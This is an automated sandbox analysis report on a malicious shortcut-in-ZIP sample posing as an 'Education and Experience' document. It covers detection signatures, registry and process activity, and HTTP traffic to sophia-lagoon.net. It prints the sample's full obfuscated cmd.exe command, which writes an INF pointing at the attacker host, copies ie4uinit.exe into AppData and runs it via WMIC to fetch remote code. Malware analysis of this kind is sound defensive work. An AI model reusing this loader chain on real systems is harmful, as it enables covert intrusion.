Windows Analysis Report
Education and Experience.lnk(1).zip

Overview

General Information

Sample Name: Education and Experience.lnk(1).zip
Analysis ID: 16737
MD5: 254c94d8e782c1e10fd3021b56638bc7
SHA1: cc6081254fa2a6f9c472123ad81534769e7dc6d3
SHA256: af67e631e6c185c8c127267fa57efffe589612feba6d43755ceda0a3104ac1ad
Infos:

Detection

Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Very long command line found
Creates processes via WMI
Contains functionality to create processes via WMI
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
Creates COM task schedule object (often to register a task for autostart)
PE file contains sections with non-standard names
Binary contains a suspicious time stamp
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)

Classification

Source: Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source: Binary string: ie4uinit.pdb source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /81754783 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sophia-lagoon.netConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474C003000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1525429471.000002474C00E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sophia-lagoon.net/81754783
Source: ie4uinit.exe, 00000013.00000003.1525429471.000002474C031000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1580755717.000002474C033000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sophia-lagoon.net/81754783WWC:
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474C003000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sophia-lagoon.net/81754783lP
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr String found in binary or memory: http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=
Source: ie4uinit.exe, 00000013.00000002.1582941785.000002474C01E000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1580755717.000002474C01A000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1525429471.000002474C00E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr String found in binary or memory: https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr String found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr String found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr String found in binary or memory: https://www.baidu.com/s?tn=80035161_2_dg&wd=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr String found in binary or memory: https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=
Source: unknown DNS traffic detected: queries for: sophia-lagoon.net
Source: global traffic HTTP traffic detected: GET /81754783 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sophia-lagoon.netConnection: Keep-Alive

System Summary
barindex
Very long command line found
Source: unknown Process created: Commandline size = 2790
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000011.00000002.1515062774.000001AF64030000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\system32\C:\Windows\System32\Wbem\WMIC.exewmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" Winsta0\Default
Deletes files inside the Windows folder
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File deleted: C:\Windows\Temp\OLDF396.tmp Jump to behavior
Source: C:\Windows\System32\xcopy.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /v /c set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" && set "Lucky10=d" && (for %u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast" && call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t" && set "Lucky26=." && set "Lucky23=settings" && set "Lucky55=si" && (for %q in (c) do @set "Lucky29=%~q") && set "Lucky65=!Lucky26!inf" && set "Lucky15=ieu!Lucky85!!Lucky65!" && call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" && !Lucky59!et "Lucky8=!Lucky11!!Lucky15!" && (for %p in ("[!Lucky03!]" "signature = !Lucky5!indows nt$" "[!Lucky10!e!Lucky59!tinationdirs]" "E4139C=01" "[!Lucky10!efaultin!Lucky59!tall.windows7]" "UnRegis!Lucky7!erOCXs=A687D4" "!Lucky10!elfil!Lucky50!s=E4139C" "[A687D4]" "%11%\scro\" "%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon!Lucky26!%Lucky56%/81754783" "[E4139C]" "ieu%Lucky69%!Lucky65!" "[!Lucky59!!Lucky7!rings]" "Lucky69=!Lucky85!" "Lucky0=t;Lucky40" "!Lucky59!ervicen!Lucky87!me=' '" "Lucky21=h" "Lucky1=:;Lucky35" "Lucky9=/" "!Lucky59!hortsvcn!Lucky87!me=' '" "Lucky56=net" "Lucky51=b;Lucky67" "Lucky25=%time%") do @e!Lucky29!ho %~p)>"!Lucky8!" && !Lucky59!et "Lucky2=ie4u!Lucky85!.!Lucky50!xe" && call xcopy /Y /C /Q %win!Lucky10!ir%\!Lucky59!ystem32\!Lucky2! "!Lucky11!*" | set Lucky93=Nation && !Lucky59!t!Lucky87!rt "" wmi!Lucky29! proce!Lucky59!s call !Lucky29!rea!Lucky7!e "!Lucky11!!Lucky2! -base!Lucky23!" | set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_02
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\AppData\Roaming\microsoft\ieuinit.inf Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File created: C:\Windows\Temp\OLDF396.tmp Jump to behavior
Source: classification engine Classification label: mal52.evad.winZIP@23/9@1/1
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2660496737-530772487-1027249058-1002\Software\Microsoft\Office Jump to behavior
Source: Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source: Binary string: ie4uinit.pdb source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
PE file contains sections with non-standard names
Source: ie4uinit.exe.14.dr Static PE information: section name: .didat
Binary contains a suspicious time stamp
Source: ie4uinit.exe.14.dr Static PE information: 0xEF6764A3 [Thu Apr 11 14:56:35 2097 UTC]

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\xcopy.exe File created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Jump to dropped file
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
